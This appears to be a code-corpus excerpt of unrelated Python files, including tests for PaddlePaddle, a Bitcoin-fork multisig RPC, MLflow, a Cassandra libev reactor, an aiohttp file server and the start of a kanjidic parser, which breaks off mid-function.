self.assertTrue(utils.check_abi_compatibility(compiler))
def del_environ(self):
key = 'PADDLE_SKIP_CHECK_ABI'
if key in os.environ:
del os.environ[key]
class TestCheckCompiler(TestABIBase):
def test_expected_compiler(self):
if utils.OS_NAME.startswith('linux'):
gt = ['gcc', 'g++', 'gnu-c++', 'gnu-cc']
elif utils.IS_WINDOWS:
gt = ['cl']
elif utils.OS_NAME.startswith('darwin'):
gt = ['clang', 'clang++']
self.assertListEqual(utils._expected_compiler_current_platform(), gt)
def test_compiler_version(self):
# clear environ
self.del_environ()
if utils.OS_NAME.startswith('linux'):
compiler = 'g++'
elif utils.IS_WINDOWS:
compiler = 'cl'
# Linux: all CI gcc version > 5.4.0
# Windows: all CI MSVC version > 19.00.24215
# Mac: clang has no version limitation, always return true
self.assertTrue(utils.check_abi_compatibility(compiler, verbose=True))
def test_wrong_compiler_warning(self):
# clear environ
self.del_environ()
compiler = 'python' # fake wrong compiler
with warnings.catch_warnings(record=True) as error:
flag = utils.check_abi_compatibility(compiler, verbose=True)
# check return False
self.assertFalse(flag)
# check Compiler Compatibility WARNING
self.assertTrue(len(error) == 1)
self.assertTrue(
"Compiler Compatibility WARNING" in str(error[0].message))
def test_exception(self):
# clear environ
self.del_environ()
compiler = 'python' # fake command
if utils.OS_NAME.startswith('linux'):
def fake():
return [compiler]
# mock a fake function
raw_func = utils._expected_compiler_current_platform
utils._expected_compiler_current_platform = fake
with warnings.catch_warnings(record=True) as error:
flag = utils.check_abi_compatibility(compiler, verbose=True)
# check return False
self.assertFalse(flag)
# check ABI Compatibility WARNING
self.assertTrue(len(error) == 1)
self.assertTrue("Failed to check compiler version for" in
str(error[0].message))
# restore
utils._expected_compiler_current_platform = raw_func
class TestJITCompilerException(unittest.TestCase):
def test_exception(self):
with self.assertRaisesRegexp(RuntimeError,
"Failed to check Python interpreter"):
file_path = os.path.abspath(__file__)
utils._jit_compile(file_path, interpreter='fake_cmd', verbose=True)
class TestRunCMDException(unittest.TestCase):
def test_exception(self):
for verbose in [True, False]:
with self.assertRaisesRegexp(RuntimeError, "Failed to run command"):
cmd = "fake cmd"
utils.run_cmd(cmd, verbose)
if __name__ == '__main__':
unittest.main()
|
py | 1a38b83634a32daa6697431bc2c6c6929ff2a557 |
def melt(df):
"""Melt a census dataframe into two value columns, for the estimate and margin"""
import pandas as pd
# Intial melt
melted = pd.melt(df, id_vars=list(df.columns[:9]), value_vars=list(df.columns[9:]))
melted = melted[['gvid', 'variable', 'value']]
# Make two seperate frames for estimates and margins.
estimates = melted[~melted.variable.str.contains('_m90')].set_index(['gvid', 'variable'])
margins = melted[melted.variable.str.contains('_m90')].copy()
margins.columns = ['gvid', 'ovariable', 'm90']
margins['variable'] = margins.ovariable.str.replace('_m90', '')
# Join the estimates to the margins.
final = estimates.join(margins.set_index(['gvid', 'variable']).drop('ovariable', axis=1))  # explicit axis keyword; positional axis is removed in pandas 2
return final
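# A worked sketch of the layout melt() assumes (column names here are
# hypothetical; the hard requirements are nine leading id columns including
# 'gvid', and a '<name>_m90' margin column per estimate column):
#
#   in:  gvid, ..., b01001_001, b01001_001_m90
#   out: index (gvid, 'b01001_001') -> columns value, m90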
# From http://stackoverflow.com/a/295466
def slugify(value):
"""
Normalizes string, converts to lowercase, removes non-alpha characters,
and converts spaces to hyphens.
"""
import re
import unicodedata
from six import text_type
value = text_type(value)
value = unicodedata.normalize('NFKD', value).encode('ascii', 'ignore').decode('utf8')
value = re.sub(r'[^\w\s-]', '-', value).strip().lower()
value = re.sub(r'[-\s]+', '-', value)
return value
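# Hedged doctest-style examples, worked through the rules above:
#
#   slugify("Héllo World")  -> "hello-world"
#   slugify("A_B  C")       -> "a_b-c"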
CACHE_NAME = 'pandasreporter'
def nl2br(v, is_xhtml=True):
if is_xhtml:
return v.replace('\n','<br />\n')
else:
return v.replace('\n','<br>\n') |
py | 1a38b9696a67e9ddacbea20d8d02536ac7e9da26 | #!/usr/bin/env python3
# Copyright (c) 2015-2020 The Beans Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multisig RPCs"""
import binascii
import decimal
import itertools
import json
import os
from test_framework.authproxy import JSONRPCException
from test_framework.descriptors import descsum_create, drop_origins
from test_framework.key import ECPubKey, ECKey
from test_framework.test_framework import BeansTestFramework
from test_framework.util import (
assert_raises_rpc_error,
assert_equal,
)
from test_framework.wallet_util import bytes_to_wif
class RpcCreateMultiSigTest(BeansTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.supports_cli = False
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def get_keys(self):
self.pub = []
self.priv = []
node0, node1, node2 = self.nodes
for _ in range(self.nkeys):
k = ECKey()
k.generate()
self.pub.append(k.get_pubkey().get_bytes().hex())
self.priv.append(bytes_to_wif(k.get_bytes(), k.is_compressed))
self.final = node2.getnewaddress()
def run_test(self):
node0, node1, node2 = self.nodes
self.check_addmultisigaddress_errors()
self.log.info('Generating blocks ...')
node0.generate(149)
self.sync_all()
self.moved = 0
for self.nkeys in [3, 5]:
for self.nsigs in [2, 3]:
for self.output_type in ["bech32", "p2sh-segwit", "legacy"]:
self.get_keys()
self.do_multisig()
self.checkbalances()
# Test mixed compressed and uncompressed pubkeys
self.log.info('Mixed compressed and uncompressed multisigs are not allowed')
pk0 = node0.getaddressinfo(node0.getnewaddress())['pubkey']
pk1 = node1.getaddressinfo(node1.getnewaddress())['pubkey']
pk2 = node2.getaddressinfo(node2.getnewaddress())['pubkey']
# decompress pk2
pk_obj = ECPubKey()
pk_obj.set(binascii.unhexlify(pk2))
pk_obj.compressed = False
pk2 = binascii.hexlify(pk_obj.get_bytes()).decode()
node0.createwallet(wallet_name='wmulti0', disable_private_keys=True)
wmulti0 = node0.get_wallet_rpc('wmulti0')
# Check all permutations of keys because order matters apparently
for keys in itertools.permutations([pk0, pk1, pk2]):
# Results should be the same as this legacy one
legacy_addr = node0.createmultisig(2, keys, 'legacy')['address']
assert_equal(legacy_addr, wmulti0.addmultisigaddress(2, keys, '', 'legacy')['address'])
# Generate addresses with the segwit types. These should all make legacy addresses
assert_equal(legacy_addr, wmulti0.createmultisig(2, keys, 'bech32')['address'])
assert_equal(legacy_addr, wmulti0.createmultisig(2, keys, 'p2sh-segwit')['address'])
assert_equal(legacy_addr, wmulti0.addmultisigaddress(2, keys, '', 'bech32')['address'])
assert_equal(legacy_addr, wmulti0.addmultisigaddress(2, keys, '', 'p2sh-segwit')['address'])
self.log.info('Testing sortedmulti descriptors with BIP 67 test vectors')
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/rpc_bip67.json'), encoding='utf-8') as f:
vectors = json.load(f)
for t in vectors:
key_str = ','.join(t['keys'])
desc = descsum_create('sh(sortedmulti(2,{}))'.format(key_str))
assert_equal(self.nodes[0].deriveaddresses(desc)[0], t['address'])
sorted_key_str = ','.join(t['sorted_keys'])
sorted_key_desc = descsum_create('sh(multi(2,{}))'.format(sorted_key_str))
assert_equal(self.nodes[0].deriveaddresses(sorted_key_desc)[0], t['address'])
def check_addmultisigaddress_errors(self):
if self.options.descriptors:
return
self.log.info('Check that addmultisigaddress fails when the private keys are missing')
addresses = [self.nodes[1].getnewaddress(address_type='legacy') for _ in range(2)]
assert_raises_rpc_error(-5, 'no full public key for address', lambda: self.nodes[0].addmultisigaddress(nrequired=1, keys=addresses))
for a in addresses:
# Importing all addresses should not change the result
self.nodes[0].importaddress(a)
assert_raises_rpc_error(-5, 'no full public key for address', lambda: self.nodes[0].addmultisigaddress(nrequired=1, keys=addresses))
def checkbalances(self):
node0, node1, node2 = self.nodes
node0.generate(100)
self.sync_all()
bal0 = node0.getbalance()
bal1 = node1.getbalance()
bal2 = node2.getbalance()
height = node0.getblockchaininfo()["blocks"]
assert 150 < height < 350
total = 149 * 50 + (height - 149 - 100) * 25
assert bal1 == 0
assert bal2 == self.moved
assert bal0 + bal1 + bal2 == total
def do_multisig(self):
node0, node1, node2 = self.nodes
if 'wmulti' not in node1.listwallets():
try:
node1.loadwallet('wmulti')
except JSONRPCException as e:
path = os.path.join(self.options.tmpdir, "node1", "regtest", "wallets", "wmulti")
if e.error['code'] == -18 and "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path) in e.error['message']:
node1.createwallet(wallet_name='wmulti', disable_private_keys=True)
else:
raise
wmulti = node1.get_wallet_rpc('wmulti')
# Construct the expected descriptor
desc = 'multi({},{})'.format(self.nsigs, ','.join(self.pub))
if self.output_type == 'legacy':
desc = 'sh({})'.format(desc)
elif self.output_type == 'p2sh-segwit':
desc = 'sh(wsh({}))'.format(desc)
elif self.output_type == 'bech32':
desc = 'wsh({})'.format(desc)
desc = descsum_create(desc)
msig = node2.createmultisig(self.nsigs, self.pub, self.output_type)
madd = msig["address"]
mredeem = msig["redeemScript"]
assert_equal(desc, msig['descriptor'])
if self.output_type == 'bech32':
assert madd[0:4] == "bcrt" # actually a bech32 address
# compare against addmultisigaddress
msigw = wmulti.addmultisigaddress(self.nsigs, self.pub, None, self.output_type)
maddw = msigw["address"]
mredeemw = msigw["redeemScript"]
assert_equal(desc, drop_origins(msigw['descriptor']))
# addmultisigiaddress and createmultisig work the same
assert maddw == madd
assert mredeemw == mredeem
txid = node0.sendtoaddress(madd, 40)
tx = node0.getrawtransaction(txid, True)
vout = [v["n"] for v in tx["vout"] if madd == v["scriptPubKey"]["address"]]
assert len(vout) == 1
vout = vout[0]
scriptPubKey = tx["vout"][vout]["scriptPubKey"]["hex"]
value = tx["vout"][vout]["value"]
prevtxs = [{"txid": txid, "vout": vout, "scriptPubKey": scriptPubKey, "redeemScript": mredeem, "amount": value}]
node0.generate(1)
outval = value - decimal.Decimal("0.00001000")
rawtx = node2.createrawtransaction([{"txid": txid, "vout": vout}], [{self.final: outval}])
prevtx_err = dict(prevtxs[0])
del prevtx_err["redeemScript"]
assert_raises_rpc_error(-8, "Missing redeemScript/witnessScript", node2.signrawtransactionwithkey, rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
# if witnessScript specified, all ok
prevtx_err["witnessScript"] = prevtxs[0]["redeemScript"]
node2.signrawtransactionwithkey(rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
# both specified, also ok
prevtx_err["redeemScript"] = prevtxs[0]["redeemScript"]
node2.signrawtransactionwithkey(rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
# redeemScript mismatch to witnessScript
prevtx_err["redeemScript"] = "6a" # OP_RETURN
assert_raises_rpc_error(-8, "redeemScript does not correspond to witnessScript", node2.signrawtransactionwithkey, rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
# redeemScript does not match scriptPubKey
del prevtx_err["witnessScript"]
assert_raises_rpc_error(-8, "redeemScript/witnessScript does not match scriptPubKey", node2.signrawtransactionwithkey, rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
# witnessScript does not match scriptPubKey
prevtx_err["witnessScript"] = prevtx_err["redeemScript"]
del prevtx_err["redeemScript"]
assert_raises_rpc_error(-8, "redeemScript/witnessScript does not match scriptPubKey", node2.signrawtransactionwithkey, rawtx, self.priv[0:self.nsigs-1], [prevtx_err])
rawtx2 = node2.signrawtransactionwithkey(rawtx, self.priv[0:self.nsigs - 1], prevtxs)
rawtx3 = node2.signrawtransactionwithkey(rawtx2["hex"], [self.priv[-1]], prevtxs)
self.moved += outval
tx = node0.sendrawtransaction(rawtx3["hex"], 0)
blk = node0.generate(1)[0]
assert tx in node0.getblock(blk)["tx"]
txinfo = node0.getrawtransaction(tx, True, blk)
self.log.info("n/m=%d/%d %s size=%d vsize=%d weight=%d" % (self.nsigs, self.nkeys, self.output_type, txinfo["size"], txinfo["vsize"], txinfo["weight"]))
wmulti.unloadwallet()
if __name__ == '__main__':
RpcCreateMultiSigTest().main()
|
py | 1a38b978f5f88dd52a8e5e9f09162f1a681327c0 | import pytest
from unittest import mock
import mlflow
from mlflow.exceptions import MlflowException
import mlflow.spark
from mlflow._spark_autologging import _get_current_listener, PythonSubscriber
from tests.spark.autologging.utils import _get_or_create_spark_session
@pytest.fixture()
def spark_session():
session = _get_or_create_spark_session()
yield session
session.stop()
@pytest.fixture()
def mock_get_current_listener():
with mock.patch("mlflow._spark_autologging._get_current_listener") as get_listener_patch:
get_listener_patch.return_value = None
yield get_listener_patch
@pytest.mark.usefixtures("spark_session")
def test_autolog_call_idempotent():
mlflow.spark.autolog()
listener = _get_current_listener()
mlflow.spark.autolog()
assert _get_current_listener() == listener
def test_subscriber_methods():
# Test that PythonSubscriber satisfies the contract expected by the underlying Scala trait
# it implements (MlflowAutologEventSubscriber)
subscriber = PythonSubscriber()
subscriber.ping()
# Assert repl ID is stable & different between subscribers
assert subscriber.replId() == subscriber.replId()
assert PythonSubscriber().replId() != subscriber.replId()
def test_enabling_autologging_throws_for_wrong_spark_version(
spark_session, mock_get_current_listener
):
# pylint: disable=unused-argument
with mock.patch("mlflow._spark_autologging._get_spark_major_version") as get_version_mock:
get_version_mock.return_value = 2
with pytest.raises(
MlflowException, match="Spark autologging unsupported for Spark versions < 3"
):
mlflow.spark.autolog()
|
py | 1a38baa30aa2a2a5659cab85a983457ddfd282cb | from random import choice
import numpy as np
from tensorflow.python.keras.utils.data_utils import Sequence
from debvader.normalize import Normalizer
class COSMOSsequence(Sequence):
def __init__(
self,
list_of_samples,
x_col_name,
y_col_name,
batch_size,
num_iterations_per_epoch,
normalizer=None,
):
"""
initializes the Data generator
parameters:
list_of_samples: list of paths to the datafiles.
x_col_name: column name of data to be fed as input to the network
y_col_name: column name of data to be fed as target to the network
        batch_size: sample size for each batch
        num_iterations_per_epoch: number of batches (each of size batch_size) drawn from the sample per epoch
        normalizer: object of debvader.normalize.Normalizer, used to perform norm and denorm operations (default is None).
"""
self.list_of_samples = list_of_samples
self.x_col_name = x_col_name
self.y_col_name = y_col_name
self.batch_size = batch_size
self.num_iterations_per_epoch = num_iterations_per_epoch
if (normalizer is not None) and (not isinstance(normalizer, Normalizer)):
raise ValueError(
"The parameter `normalizer` should be an instance of debvader.normalize.Normalizer"
)
self.normalizer = normalizer
def __len__(self):
return self.num_iterations_per_epoch
def __getitem__(self, idx):
current_loop_file_name = choice(self.list_of_samples)
current_sample = np.load(current_loop_file_name, allow_pickle=True)
batch = np.random.choice(current_sample, size=self.batch_size, replace=False)
x = batch[self.x_col_name]
y = batch[self.y_col_name]
x = np.array(x.tolist())
y = np.array(y.tolist())
if self.normalizer is not None:
x = self.normalizer.forward(x)
y = self.normalizer.forward(y)
        # Random augmentation: flip the image and/or swap its spatial axes.
rand = np.random.randint(4)
if rand == 1:
x = np.flip(x, axis=-1)
y = np.flip(y, axis=-1)
elif rand == 2:
x = np.swapaxes(x, -1, -2)
y = np.swapaxes(y, -1, -2)
elif rand == 3:
x = np.swapaxes(np.flip(x, axis=-1), -1, -2)
y = np.swapaxes(np.flip(y, axis=-1), -1, -2)
# Change the shape of inputs and targets to feed the network
x = np.transpose(x, axes=(0, 2, 3, 1))
y = np.transpose(y, axes=(0, 2, 3, 1))
return x, y
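
# Usage sketch (illustrative only: the file paths, column names, and the Keras
# model below are hypothetical and not part of this module):
# train_seq = COSMOSsequence(
#     list_of_samples=["samples/train_0.npy", "samples/train_1.npy"],
#     x_col_name="blended_gal_stamps",
#     y_col_name="isolated_gal_stamps",
#     batch_size=32,
#     num_iterations_per_epoch=100,
# )
# model.fit(train_seq, epochs=10)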
|
py | 1a38bc342f109d22202d48bb18d1f523ad5bf8b4 | from mpi4py import MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
if rank == 0:
data = [1,3,5,7]
comm.send(data, dest=1)
if rank == 1:
info = MPI.Status()
data = comm.recv(source=0, status=info)
print("Received %d bytes of data." % info.Get_count())
print("Received %d integers." % info.Get_elements(MPI.INT))
|
py | 1a38bc395863228a5ee95d3210ea623a7032929a | #!/usr/bin/env python3
"""Simple server written using an event loop."""
import argparse
import logging
import os
import sys
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
import asyncio
import aiohttp
import aiohttp.server
class HttpRequestHandler(aiohttp.server.ServerHttpProtocol):
@asyncio.coroutine
def handle_request(self, message, payload):
print('method = {!r}; path = {!r}; version = {!r}'.format(
message.method, message.path, message.version))
path = message.path
if (not (path.isprintable() and path.startswith('/')) or '/.' in path):
print('bad path', repr(path))
path = None
else:
path = '.' + path
if not os.path.exists(path):
print('no file', repr(path))
path = None
else:
isdir = os.path.isdir(path)
if not path:
raise aiohttp.HttpProcessingError(code=404)
for hdr, val in message.headers.items():
print(hdr, val)
if isdir and not path.endswith('/'):
path = path + '/'
raise aiohttp.HttpProcessingError(
code=302, headers=(('URI', path), ('Location', path)))
response = aiohttp.Response(
self.writer, 200, http_version=message.version)
response.add_header('Transfer-Encoding', 'chunked')
# content encoding
accept_encoding = message.headers.get('accept-encoding', '').lower()
if 'deflate' in accept_encoding:
response.add_header('Content-Encoding', 'deflate')
response.add_compression_filter('deflate')
elif 'gzip' in accept_encoding:
response.add_header('Content-Encoding', 'gzip')
response.add_compression_filter('gzip')
response.add_chunking_filter(1025)
if isdir:
response.add_header('Content-type', 'text/html')
response.send_headers()
response.write(b'<ul>\r\n')
for name in sorted(os.listdir(path)):
if name.isprintable() and not name.startswith('.'):
try:
bname = name.encode('ascii')
except UnicodeError:
pass
else:
if os.path.isdir(os.path.join(path, name)):
response.write(b'<li><a href="' + bname +
b'/">' + bname + b'/</a></li>\r\n')
else:
response.write(b'<li><a href="' + bname +
b'">' + bname + b'</a></li>\r\n')
response.write(b'</ul>')
else:
response.add_header('Content-type', 'text/plain')
response.send_headers()
try:
with open(path, 'rb') as fp:
chunk = fp.read(8192)
while chunk:
response.write(chunk)
chunk = fp.read(8192)
except OSError:
response.write(b'Cannot open')
yield from response.write_eof()
if response.keep_alive():
self.keep_alive(True)
ARGS = argparse.ArgumentParser(description="Run simple HTTP server.")
ARGS.add_argument(
'--host', action="store", dest='host',
default='127.0.0.1', help='Host name')
ARGS.add_argument(
'--port', action="store", dest='port',
default=8080, type=int, help='Port number')
# make iocp and ssl mutually exclusive because ProactorEventLoop is
# incompatible with SSL
group = ARGS.add_mutually_exclusive_group()
group.add_argument(
'--iocp', action="store_true", dest='iocp', help='Windows IOCP event loop')
group.add_argument(
'--ssl', action="store_true", dest='ssl', help='Run ssl mode.')
ARGS.add_argument(
'--sslcert', action="store", dest='certfile', help='SSL cert file.')
ARGS.add_argument(
'--sslkey', action="store", dest='keyfile', help='SSL key file.')
def main():
args = ARGS.parse_args()
if ':' in args.host:
args.host, port = args.host.split(':', 1)
args.port = int(port)
if args.iocp:
from asyncio import windows_events
sys.argv.remove('--iocp')
logging.info('using iocp')
el = windows_events.ProactorEventLoop()
asyncio.set_event_loop(el)
if args.ssl:
here = os.path.join(os.path.dirname(__file__), 'tests')
if args.certfile:
certfile = args.certfile or os.path.join(here, 'sample.crt')
keyfile = args.keyfile or os.path.join(here, 'sample.key')
else:
certfile = os.path.join(here, 'sample.crt')
keyfile = os.path.join(here, 'sample.key')
sslcontext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sslcontext.load_cert_chain(certfile, keyfile)
else:
sslcontext = None
loop = asyncio.get_event_loop()
f = loop.create_server(
lambda: HttpRequestHandler(debug=True, keep_alive=75),
args.host, args.port,
ssl=sslcontext)
svr = loop.run_until_complete(f)
socks = svr.sockets
print('serving on', socks[0].getsockname())
try:
loop.run_forever()
except KeyboardInterrupt:
pass
if __name__ == '__main__':
main()
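
# Example invocation (script name assumed): python simple_server.py --host 127.0.0.1 --port 8080
# then fetch a directory listing with: curl http://127.0.0.1:8080/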
|
py | 1a38bc6d193e35222040f72e6d475a8c5ff47e74 | import unittest
import threading
import queue
import time
import sys
sys.path.append("./functions")
import windows
class Streamer:
def __init__(self):
self.buffer = queue.Queue(maxsize=2)
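        # A bounded queue provides backpressure: post() blocks on join()
        # whenever the buffer is full, until the consumer marks items done.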
def post(self, item):
if self.buffer.full():
#print("waiting")
self.buffer.join()
#print("post item")
self.buffer.put(item)
time.sleep(0.1)
def stream(self):
while True:
try:
yield self.buffer.get(timeout=1)
self.buffer.task_done()
except queue.Empty:
return
class MyTestCase(unittest.TestCase):
def test_streaming(self):
streamer = Streamer()
def post(count):
for i in range(count):
streamer.post("%d"%i)
thread = threading.Thread(target=post,args=[9])
thread.start()
for w in windows.discrete_window_text(streamer.stream()):
print(w)
thread.join()
if __name__ == '__main__':
unittest.main()
|
py | 1a38bd61430b2697b5d3481a8f716af81ee2abe2 | # Copyright DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import atexit
from collections import deque
from functools import partial
import logging
import os
import socket
import ssl
from threading import Lock, Thread
import time
from six.moves import range
from cassandra.connection import (Connection, ConnectionShutdown,
NONBLOCKING, Timer, TimerManager)
try:
import cassandra.io.libevwrapper as libev
except ImportError:
raise ImportError(
"The C extension needed to use libev was not found. This "
"probably means that you didn't have the required build dependencies "
"when installing the driver. See "
"http://datastax.github.io/python-driver/installation.html#c-extensions "
"for instructions on installing build dependencies and building "
"the C extension.")
log = logging.getLogger(__name__)
def _cleanup(loop):
if loop:
loop._cleanup()
class LibevLoop(object):
def __init__(self):
self._pid = os.getpid()
self._loop = libev.Loop()
self._notifier = libev.Async(self._loop)
self._notifier.start()
# prevent _notifier from keeping the loop from returning
self._loop.unref()
self._started = False
self._shutdown = False
self._lock = Lock()
self._lock_thread = Lock()
self._thread = None
# set of all connections; only replaced with a new copy
# while holding _conn_set_lock, never modified in place
self._live_conns = set()
# newly created connections that need their write/read watcher started
self._new_conns = set()
# recently closed connections that need their write/read watcher stopped
self._closed_conns = set()
self._conn_set_lock = Lock()
self._preparer = libev.Prepare(self._loop, self._loop_will_run)
# prevent _preparer from keeping the loop from returning
self._loop.unref()
self._preparer.start()
self._timers = TimerManager()
self._loop_timer = libev.Timer(self._loop, self._on_loop_timer)
def maybe_start(self):
should_start = False
with self._lock:
if not self._started:
log.debug("Starting libev event loop")
self._started = True
should_start = True
if should_start:
with self._lock_thread:
if not self._shutdown:
self._thread = Thread(target=self._run_loop, name="event_loop")
self._thread.daemon = True
self._thread.start()
self._notifier.send()
def _run_loop(self):
while True:
self._loop.start()
# there are still active watchers, no deadlock
with self._lock:
if not self._shutdown and self._live_conns:
log.debug("Restarting event loop")
continue
else:
# all Connections have been closed, no active watchers
log.debug("All Connections currently closed, event loop ended")
self._started = False
break
def _cleanup(self):
self._shutdown = True
if not self._thread:
return
for conn in self._live_conns | self._new_conns | self._closed_conns:
conn.close()
for watcher in (conn._write_watcher, conn._read_watcher):
if watcher:
watcher.stop()
self.notify() # wake the timer watcher
# PYTHON-752 Thread might have just been created and not started
with self._lock_thread:
self._thread.join(timeout=1.0)
if self._thread.is_alive():
log.warning(
"Event loop thread could not be joined, so shutdown may not be clean. "
"Please call Cluster.shutdown() to avoid this.")
log.debug("Event loop thread was joined")
def add_timer(self, timer):
self._timers.add_timer(timer)
self._notifier.send() # wake up in case this timer is earlier
def _update_timer(self):
if not self._shutdown:
next_end = self._timers.service_timeouts()
if next_end:
self._loop_timer.start(next_end - time.time()) # timer handles negative values
else:
self._loop_timer.stop()
def _on_loop_timer(self):
self._timers.service_timeouts()
def notify(self):
self._notifier.send()
def connection_created(self, conn):
with self._conn_set_lock:
new_live_conns = self._live_conns.copy()
new_live_conns.add(conn)
self._live_conns = new_live_conns
new_new_conns = self._new_conns.copy()
new_new_conns.add(conn)
self._new_conns = new_new_conns
def connection_destroyed(self, conn):
with self._conn_set_lock:
new_live_conns = self._live_conns.copy()
new_live_conns.discard(conn)
self._live_conns = new_live_conns
new_closed_conns = self._closed_conns.copy()
new_closed_conns.add(conn)
self._closed_conns = new_closed_conns
self._notifier.send()
def _loop_will_run(self, prepare):
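        # Runs before each loop iteration: reconcile watcher state with
        # connection state, keeping write watchers active only for
        # connections with queued data and starting/stopping read watchers
        # for newly created/closed connections.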
changed = False
for conn in self._live_conns:
if not conn.deque and conn._write_watcher_is_active:
if conn._write_watcher:
conn._write_watcher.stop()
conn._write_watcher_is_active = False
changed = True
elif conn.deque and not conn._write_watcher_is_active:
conn._write_watcher.start()
conn._write_watcher_is_active = True
changed = True
if self._new_conns:
with self._conn_set_lock:
to_start = self._new_conns
self._new_conns = set()
for conn in to_start:
conn._read_watcher.start()
changed = True
if self._closed_conns:
with self._conn_set_lock:
to_stop = self._closed_conns
self._closed_conns = set()
for conn in to_stop:
if conn._write_watcher:
conn._write_watcher.stop()
# clear reference cycles from IO callback
del conn._write_watcher
if conn._read_watcher:
conn._read_watcher.stop()
# clear reference cycles from IO callback
del conn._read_watcher
changed = True
# TODO: update to do connection management, timer updates through dedicated async 'notifier' callbacks
self._update_timer()
if changed:
self._notifier.send()
_global_loop = None
atexit.register(partial(_cleanup, _global_loop))
class LibevConnection(Connection):
"""
An implementation of :class:`.Connection` that uses libev for its event loop.
"""
_write_watcher_is_active = False
_read_watcher = None
_write_watcher = None
_socket = None
@classmethod
def initialize_reactor(cls):
global _global_loop
if not _global_loop:
_global_loop = LibevLoop()
else:
if _global_loop._pid != os.getpid():
log.debug("Detected fork, clearing and reinitializing reactor state")
cls.handle_fork()
_global_loop = LibevLoop()
@classmethod
def handle_fork(cls):
global _global_loop
if _global_loop:
_global_loop._cleanup()
_global_loop = None
@classmethod
def create_timer(cls, timeout, callback):
timer = Timer(timeout, callback)
_global_loop.add_timer(timer)
return timer
def __init__(self, *args, **kwargs):
Connection.__init__(self, *args, **kwargs)
self.deque = deque()
self._deque_lock = Lock()
self._connect_socket()
self._socket.setblocking(0)
with _global_loop._lock:
self._read_watcher = libev.IO(self._socket.fileno(), libev.EV_READ, _global_loop._loop, self.handle_read)
self._write_watcher = libev.IO(self._socket.fileno(), libev.EV_WRITE, _global_loop._loop, self.handle_write)
self._send_options_message()
_global_loop.connection_created(self)
# start the global event loop if needed
_global_loop.maybe_start()
def close(self):
with self.lock:
if self.is_closed:
return
self.is_closed = True
log.debug("Closing connection (%s) to %s", id(self), self.endpoint)
_global_loop.connection_destroyed(self)
self._socket.close()
log.debug("Closed socket to %s", self.endpoint)
# don't leave in-progress operations hanging
if not self.is_defunct:
self.error_all_requests(
ConnectionShutdown("Connection to %s was closed" % self.endpoint))
def handle_write(self, watcher, revents, errno=None):
if revents & libev.EV_ERROR:
if errno:
exc = IOError(errno, os.strerror(errno))
else:
exc = Exception("libev reported an error")
self.defunct(exc)
return
while True:
try:
with self._deque_lock:
next_msg = self.deque.popleft()
except IndexError:
return
try:
sent = self._socket.send(next_msg)
except socket.error as err:
if (err.args[0] in NONBLOCKING or
err.args[0] in (ssl.SSL_ERROR_WANT_READ, ssl.SSL_ERROR_WANT_WRITE)):
with self._deque_lock:
self.deque.appendleft(next_msg)
else:
self.defunct(err)
return
else:
if sent < len(next_msg):
with self._deque_lock:
self.deque.appendleft(next_msg[sent:])
def handle_read(self, watcher, revents, errno=None):
if revents & libev.EV_ERROR:
if errno:
exc = IOError(errno, os.strerror(errno))
else:
exc = Exception("libev reported an error")
self.defunct(exc)
return
try:
while True:
buf = self._socket.recv(self.in_buffer_size)
self._iobuf.write(buf)
if len(buf) < self.in_buffer_size:
break
except socket.error as err:
if ssl and isinstance(err, ssl.SSLError):
if err.args[0] in (ssl.SSL_ERROR_WANT_READ, ssl.SSL_ERROR_WANT_WRITE):
return
else:
self.defunct(err)
return
elif err.args[0] in NONBLOCKING:
return
else:
self.defunct(err)
return
if self._iobuf.tell():
self.process_io_buffer()
else:
log.debug("Connection %s closed by server", self)
self.close()
def push(self, data):
sabs = self.out_buffer_size
if len(data) > sabs:
chunks = []
for i in range(0, len(data), sabs):
chunks.append(data[i:i + sabs])
else:
chunks = [data]
with self._deque_lock:
self.deque.extend(chunks)
_global_loop.notify()
|
py | 1a38bd8887ec6fb8e7ce9321a8ad4b00b05b6a88 | import logging
from peek_platform import PeekPlatformConfig
from peek_platform.sw_install.PeekSwInstallManagerABC import PeekSwInstallManagerABC
__author__ = 'synerty'
logger = logging.getLogger(__name__)
class PeekSwInstallManager(PeekSwInstallManagerABC):
def __init__(self):
PeekSwInstallManagerABC.__init__(self)
self._restarting = False
def _stopCode(self):
PeekPlatformConfig.pluginLoader.unloadAllPlugins()
def _upgradeCode(self):
pass
def _startCode(self):
PeekPlatformConfig.pluginLoader.loadAllPlugins()
def restartProcess(self):
# When we receive this signal, the processes have already been instructed
        # to shut down.
self._restarting = True
logger.info("Shutting down celery workers")
from peek_plugin_base.worker.CeleryApp import celeryApp
celeryApp.control.broadcast('shutdown')
@property
def restartTriggered(self):
return self._restarting
def realyRestartProcess(self):
PeekSwInstallManagerABC.restartProcess(self)
|
py | 1a38bd969158aee7f00f6cd828e6511b14a06aff | from xml.etree import ElementTree as ET
import re
import copy
import json
from tqdm import tqdm
FILE = 'kanjidic2.xml'
TEMPLATE = {
"kanji": "",
"strokes": 0,
"freq": None,
"jlpt": None,
"grade": 0,
"reading": {
"kun": [],
"on": []
},
"meaning": [],
"name_reading": []
}
def parse_misc(elements, new):
for ele in elements:
if ele.tag.lower() == "grade":
new['grade'] = ele.text
elif ele.tag.lower() == 'stroke_count':
new['strokes'] = ele.text
elif ele.tag.lower() == 'freq':
new['freq'] = ele.text
elif ele.tag.lower() == "jlpt":
new['jlpt'] = ele.text
def parse_literal(elements, new):
new['kanji'] = elements.text
def parse_rmgroup(elements, new):
for ele in elements:
